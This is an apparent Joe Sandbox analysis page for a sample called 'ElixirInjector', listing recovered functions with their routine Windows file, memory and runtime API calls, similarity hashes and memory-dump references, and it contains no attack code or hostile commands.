Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 482eab48c5db1a82e85ce433fe0d8f80cb0cbe2cf929e520d86935cc198f6e62
Instruction ID: 05fcc7be24c72cefa9b2451e1a9ffb1891e67c67e9ee1b02e65726c3ccfe231a
Opcode Fuzzy Hash: 482eab48c5db1a82e85ce433fe0d8f80cb0cbe2cf929e520d86935cc198f6e62
Instruction Fuzzy Hash: C3014E753003196FD3349F64BC41F767358FB51752F20002DFA42921C0CAA0B8C57324

Function 00F19F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00F1D343,00000001,?,?,?,00000000,00F2551D,?,?,?), ref: 00F19F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00F2551D,?,?,?,?,?,00F24FC7,?), ref: 00F19FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00F1D343,00000001,?,?), ref: 00F1A011

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 5a90eddcce89fdfff5d19b973f49ea466e37a72925988f4e3b1fb5aaf4f2669e
Instruction ID: dc6476c4c51eaae61de3ac73183e4957c47e1969d2d752d60c31d6ffdfcc6465
Opcode Fuzzy Hash: 5a90eddcce89fdfff5d19b973f49ea466e37a72925988f4e3b1fb5aaf4f2669e
Instruction Fuzzy Hash: 0131F332608305AFDB14CF20D818BAE77A5FF95725F00051DF94197290C775AD88EBA2

Function 00F1A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00F1C27E: _wcslen.LIBCMT ref: 00F1C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A30C
GetLastError.KERNEL32(?,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A329

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: f6164001f09bf6cec344c24f4f865b06e74b0f741b5bb44b50a6cf1c67246cd7
Instruction ID: 7856c2899eacd69b7b4840451337a34355314e39b500d932462fadd8dc621c98
Opcode Fuzzy Hash: f6164001f09bf6cec344c24f4f865b06e74b0f741b5bb44b50a6cf1c67246cd7
Instruction Fuzzy Hash: E6014735A02314AAEF21AB754C09BFE33589F1A394F040419F802E2085D76ACAC1F6B3

Function 00F3B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F3B8B8

Strings

, xrefs: 00F3B8FD

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 49205397a9c207de8a7c0542f9102a5618ecb24e016b0384a6d1bb40219fba17
Instruction ID: e59c01ff8d87c7f139c0c25a33722a95f84992878d5edbcdf7af6a7c1524e7b8
Opcode Fuzzy Hash: 49205397a9c207de8a7c0542f9102a5618ecb24e016b0384a6d1bb40219fba17
Instruction Fuzzy Hash: C141177190438C9EDF218E24CC94BFABBB9EF55324F1404ECE6DA86142D335AA45EF60

Function 00F3AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00F3AFDD

Strings

LCMapStringEx, xrefs: 00F3AF7D, 00F3AF87

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 47d2b4042f250322f529235e1f1e9ce295e25e8922092701368cf1cf6326cd53
Instruction ID: 15f89be04e12d772fa91393d18a239d5059acbf3a0e9017a9ed7f84e17685a26
Opcode Fuzzy Hash: 47d2b4042f250322f529235e1f1e9ce295e25e8922092701368cf1cf6326cd53
Instruction Fuzzy Hash: D201D03660421DBBCF02AFA1EC06DAE7F62EB49760F414154FE1466160CB76CA31BB92

Function 00F3AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F3A56F), ref: 00F3AF55

Strings

InitializeCriticalSectionEx, xrefs: 00F3AF1B, 00F3AF25

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 78e48865a1842a7fdb52a974efdcbe960b024bb685cdc8317d57fb67812607c7
Instruction ID: b0c49f817fb9e0305d426732b42fa3ad932b0b058d452a0d4008aa4f83440d84
Opcode Fuzzy Hash: 78e48865a1842a7fdb52a974efdcbe960b024bb685cdc8317d57fb67812607c7
Instruction Fuzzy Hash: 4EF0E235A4521CBFCF02AF61DC02DAEBF61EF55B21F404068FC089A260DB719E10BB86

Function 00F3ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00F3ADEE

Strings

FlsAlloc, xrefs: 00F3ADC0, 00F3ADCA

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 0991336ff916c4790072b4329f9b7dc72378fc3987ac7c98def16686309ee516
Instruction ID: eb4068df16d5a28174dc617831d2ed03fbc04c5f2454538d7b69b538e800f13c
Opcode Fuzzy Hash: 0991336ff916c4790072b4329f9b7dc72378fc3987ac7c98def16686309ee516
Instruction Fuzzy Hash: 4AE0E531B4931CBBC701AB66DC02D6EBF54EB65731F4101A9FC0597240DE749E41B6D6

Function 00F3BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00F3B7BB: GetOEMCP.KERNEL32(00000000,?,?,00F3BA44,?), ref: 00F3B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F3BA89,?,00000000), ref: 00F3BC64
GetCPInfo.KERNEL32(00000000,00F3BA89,?,?,?,00F3BA89,?,00000000), ref: 00F3BC77

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: aac30dc1328097768f25952a7eca46a2f532bb106dfca488d1eeee7e2053522d
Instruction ID: 8f35cbf6900df047e53de7c6db7453f912dbcdcb8a1585d2f042b8af71b665a5
Opcode Fuzzy Hash: aac30dc1328097768f25952a7eca46a2f532bb106dfca488d1eeee7e2053522d
Instruction Fuzzy Hash: 53514571E002459FDB20CF75C8A16BABBF5EF41330F18406EDA968B291D7399946FB90

Function 00F19A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00F19A50,?,?,00000000,?,?,00F18CBC,?), ref: 00F19BAB
GetLastError.KERNEL32(?,00000000,00F18411,-00009570,00000000,000007F3), ref: 00F19BB6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cc7944f31bae2715999f9e75ba7041f9d11cf3aa1ca3f2d058f78f52dd668ad4
Instruction ID: 44c9792541e71130cd7051af49929fcd8a7997449bcc5f6074243d22e86013a6
Opcode Fuzzy Hash: cc7944f31bae2715999f9e75ba7041f9d11cf3aa1ca3f2d058f78f52dd668ad4
Instruction Fuzzy Hash: 8441DF7590C3018FDB24DF14E5A45AAB7E5FFE5320F148A2DE89183260D7F4AE84AAD1

Function 00F3BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00F397E5: GetLastError.KERNEL32(?,00F51098,00F34674,00F51098,?,?,00F340EF,?,?,00F51098), ref: 00F397E9
Part of subcall function 00F397E5: _free.LIBCMT ref: 00F3981C
Part of subcall function 00F397E5: SetLastError.KERNEL32(00000000,?,00F51098), ref: 00F3985D
Part of subcall function 00F397E5: _abort.LIBCMT ref: 00F39863

Part of subcall function 00F3BB4E: _abort.LIBCMT ref: 00F3BB80
Part of subcall function 00F3BB4E: _free.LIBCMT ref: 00F3BBB4

Part of subcall function 00F3B7BB: GetOEMCP.KERNEL32(00000000,?,?,00F3BA44,?), ref: 00F3B7E6

_free.LIBCMT ref: 00F3BA9F
_free.LIBCMT ref: 00F3BAD5

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 2f524c8fa9b4f4bf15413112603f639ed83d68b00ca23f1d0642d3bb086daea4
Instruction ID: 2e3d6ed3ca88898a28cc6dfe5aaca702f2aa89d81ed4a8a862e8df1831f47ba3
Opcode Fuzzy Hash: 2f524c8fa9b4f4bf15413112603f639ed83d68b00ca23f1d0642d3bb086daea4
Instruction Fuzzy Hash: 7E319131D0460DAFDB10EFA8D851B99B7F5EF41330F254099EE049B2A2EB7A5D41EB50

Function 00F11E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F11E55

Part of subcall function 00F13BBA: __EH_prolog.LIBCMT ref: 00F13BBF

_wcslen.LIBCMT ref: 00F11EFD

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: f4ae8837156e4e2bdf91f572c28cc66051d81ad9fb37c7e1d22e4909739b5fc8
Instruction ID: 5c94c6b64768489d70c7d29ac08075cea22fac251843efef7cdb18cc97a76482
Opcode Fuzzy Hash: f4ae8837156e4e2bdf91f572c28cc66051d81ad9fb37c7e1d22e4909739b5fc8
Instruction Fuzzy Hash: C4316B71D042099FCF15DF98D945AEEBBF6BF58310F100069F945A7251C7365E80EB60

Function 00F19DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F173BC,?,?,?,00000000), ref: 00F19DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00F19E70

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 54d96e78b56cb3545fc66bbad93b6ac6643704798d2db66ea1c4c4a651d76883
Instruction ID: ccf7dbdd8dd6bbd207e9fadc52d0f78d8e189d6ae143fe2018a2050ce7345f10
Opcode Fuzzy Hash: 54d96e78b56cb3545fc66bbad93b6ac6643704798d2db66ea1c4c4a651d76883
Instruction Fuzzy Hash: 9521D03164C245AFC714CF34D8A1AABBBE4AF65314F08491CF4C587181D369EA8DABA1

Function 00F1966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F19F27,?,?,00F1771A), ref: 00F196E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F19F27,?,?,00F1771A), ref: 00F19716

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5ee1dc0dcb35f8b80d4daefcd7113dbe455e25ddbf348c8545e21114991c0d58
Instruction ID: 4cbdee0a918373349ac3de0fa927b156818ef5310a9b575f9328bf8c01635f3f
Opcode Fuzzy Hash: 5ee1dc0dcb35f8b80d4daefcd7113dbe455e25ddbf348c8545e21114991c0d58
Instruction Fuzzy Hash: 4B21C171508344AFE3308A65CC89BF777DCEB59334F100A29F9D5C25D1C7B8A884A6B1

Function 00F19E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00F19EC7
GetLastError.KERNEL32 ref: 00F19ED4

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 0143b845b8a45f02a986cb79de1ab09c8267ad84fea2108f6ade37d78fec0981
Instruction ID: fdbf454bde17d2ec38d809a50ca649562b531527b8ed771da83fe2f6dc630e3e
Opcode Fuzzy Hash: 0143b845b8a45f02a986cb79de1ab09c8267ad84fea2108f6ade37d78fec0981
Instruction Fuzzy Hash: F411C231A04604ABD724C628CC50BE6B7E9AB45370F604A29E563D26D0D7F1BD89EBA0

Function 00F38E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F38E75

Part of subcall function 00F38E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F34286,?,0000015D,?,?,?,?,00F35762,000000FF,00000000,?,?), ref: 00F38E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00F51098,00F117CE,?,?,00000007,?,?,?,00F113D6,?,00000000), ref: 00F38EB1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 4cddf0c3b6b879c9fa1e236ff7c77386516b23eaa2dea112cca63fdcf15bd60b
Instruction ID: ad6be72bda4e7ac0023b0b32a7e613121f6b323fe62aefb0747dfacb7901d364
Opcode Fuzzy Hash: 4cddf0c3b6b879c9fa1e236ff7c77386516b23eaa2dea112cca63fdcf15bd60b
Instruction Fuzzy Hash: A9F06232A05315A6DB212AE59C05B6F37589F92BF0F244126F818A6191DFACDD83B1A1

Function 00F2109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00F210AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00F210B2

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 07e31bc5e0c7fa220620d63703e914f473e43c36d35b6d7e096de9311947cca5
Instruction ID: f848a25858b33063caa40048ecb15d1d1b2f3c27bbeb0a6439d1f1a69f50fd6a
Opcode Fuzzy Hash: 07e31bc5e0c7fa220620d63703e914f473e43c36d35b6d7e096de9311947cca5
Instruction Fuzzy Hash: 02E09236F01159A7CF19C7A5AC058AB72EDFA642183104175E803D3101F930DE416664

Function 00F1A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F1A325,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A501

Part of subcall function 00F1BB03: _wcslen.LIBCMT ref: 00F1BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F1A325,?,?,?,00F1A175,?,00000001,00000000,?,?), ref: 00F1A532

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 4461df5f684dc173180716fc02309bbd88abd47ea3959579ce683171bc5e4e46
Instruction ID: c74b32051712ffae97efead66502e4ff9d54bd44a019967fd0f7d9b1332558c4
Opcode Fuzzy Hash: 4461df5f684dc173180716fc02309bbd88abd47ea3959579ce683171bc5e4e46
Instruction Fuzzy Hash: 8FF0A932240209BBEF019F60DC41FDA376DAF14389F488460BC48E6160DB31CAD8FA10

Function 00F1A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00F1977F,?,?,00F195CF,?,?,?,?,?,00F42641,000000FF), ref: 00F1A1F1

Part of subcall function 00F1BB03: _wcslen.LIBCMT ref: 00F1BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F1977F,?,?,00F195CF,?,?,?,?,?,00F42641), ref: 00F1A21F

Memory Dump Source

